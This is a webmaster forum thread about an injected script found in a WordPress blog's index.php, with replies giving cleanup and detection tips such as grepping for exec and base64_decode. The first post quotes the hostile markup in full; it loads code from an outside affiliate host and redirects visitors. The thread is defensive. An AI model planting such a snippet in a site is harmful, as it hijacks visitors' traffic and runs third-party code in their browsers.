PHP Injection?!?! http://valueaffiliate.net/abp

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • Telly
    Confirmed User
    • Jul 2007
    • 334

    #1

    PHP Injection?!?! http://valueaffiliate.net/abp

    I discovered a hack on my personal blog that I think might be of interest to all of us. When browsing hawaiipornblog.com with Firefox and adblock turned on I was redirected to http://valueaffiliate.net/abp

    It appears that this is some kind of cloaking injection on the index.php:
    <script type="text/javascript">var isloaded = false;</script><script type="text/javascript" src="http://valueaffiliate.net/overlay_gateway.php?pub=152855&gateid=MTk4NDkx"></script><script type="text/javascript">if (!isloaded) { window.location = 'http://valueaffiliate.net/abp'; }</script><noscript><meta http-equiv="refresh" content="0;url=http://valueaffiliate.net/java" /></noscript>

    Has anyone had a similar problem? I've commented it out but am unsure as to what it's doing other than redirecting adblock traffic. Your help would be appreciated!

    Telly

    MetroMoney.com - Limited-time $40PPS Promotion!
    DeviantHardcore.com
  • AzteK
    Confirmed User
    • Feb 2001
    • 3451

    #2
    ugh my antivirus just blocked this

    Comment

    • SASCH
      Confirmed User
      • Jul 2011
      • 107

      #3
      You using WordPress?
      Account no longer in use.

      Comment

      • Telly
        Confirmed User
        • Jul 2007
        • 334

        #4
        Originally posted by SASCH
        You using WordPress?
        Yup I'm on wordpress and am upgraded to the latest version, though I don't know how long that script has been on my site. What I do know is that sales took a dive for the past month so I can only guess it's been since then.

        MetroMoney.com - Limited-time $40PPS Promotion!
        DeviantHardcore.com

        Comment

        • fris
          Too lazy to set a custom title
          • Aug 2002
          • 55679

          #5
          Originally posted by Telly
          Yup I'm on wordpress and am upgraded to the latest version, though I don't know how long that script has been on my site. What I do know is that sales took a dive for the past month so I can only guess it's been since then.
          download the zip from wordpress.org reupload the files which will replace all the core files. if the problem still is there, have a look at your theme code, mostly functions.php footer.php and header.php

          or hit me up if you need help.
          Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

          Comment

          • Telly
            Confirmed User
            • Jul 2007
            • 334

            #6
            Originally posted by fris
            download the zip from wordpress.org reupload the files which will replace all the core files. if the problem still is there, have a look at your theme code, mostly functions.php footer.php and header.php

            or hit me up if you need help.
            Thank you!

            MetroMoney.com - Limited-time $40PPS Promotion!
            DeviantHardcore.com

            Comment

            • Mr Pheer
              So Fucking Banned
              • Dec 2002
              • 22083

              #7
              I'd like to kill the fuckin assholes that do this type of shit.

              Comment

              • Telly
                Confirmed User
                • Jul 2007
                • 334

                #8
                Originally posted by Mr Pheer
                I'd like to kill the fuckin assholes that do this type of shit.
                heh "like"

                MetroMoney.com - Limited-time $40PPS Promotion!
                DeviantHardcore.com

                Comment

                • scouser
                  marketer.
                  • Aug 2006
                  • 2280

                  #9
                  do a search for things like 'exec' or 'base64_decode'

                  ie
                  grep -r 'exec' ./
                  in ur root dir.

                  anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what its doing.

                  Comment

                  • iSpyCams
                    Amateur Gynecologist
                    • May 2009
                    • 4436

                    #10
                    a while back I had an infection and the bastards made a chron job on my server that kept reinstalling it every day. So check your chron jobs too.
                    - As soon as I think up a good sig it's going here.

                    Comment

                    • Brujah
                      Beer Money Baron
                      • Jan 2001
                      • 22157

                      #11
                      You may also need to clear any cache folders, like supercache, etc..

                      Comment

                      • seeandsee
                        Check SIG!
                        • Mar 2006
                        • 50945

                        #12
                        problem is how you got hacked, is it host, is it ftp, is it script...
                        BUY MY SIG - 50$/Year

                        Contact here

                        Comment

                        • vdbucks
                          Monger Cash
                          • Jul 2010
                          • 2773

                          #13
                          Originally posted by deadmoon
                          do a search for things like 'exec' or 'base64_decode'

                          ie
                          grep -r 'exec' ./
                          in ur root dir.

                          anything that has that and things like base64_decode() is often a hacked script. sometimes searching for file_get_contents or curl() will find stuff too. if it is all grouped together and not clear/tidy code make sure to give it a good look and work out what its doing.
                          xargs is faster ^^

                          for example... cd to blog root directory then

                          find . | xargs grep 'exec'
                          Last edited by vdbucks; 10-05-2011, 05:52 AM.

                          Comment

                          • fris
                            Too lazy to set a custom title
                            • Aug 2002
                            • 55679

                            #14
                            shared hosting sucks for wordpress, because if someone else on the server has an insecure script then they can get access to any site on the shared server.

                            this is why i always have a decicated and im the only one with access so that way if something happens i can only blame myself.
                            Since 1999: 69 Adult Industry awards for Best Hosting Company and professional excellence.

                            Comment

                            Working...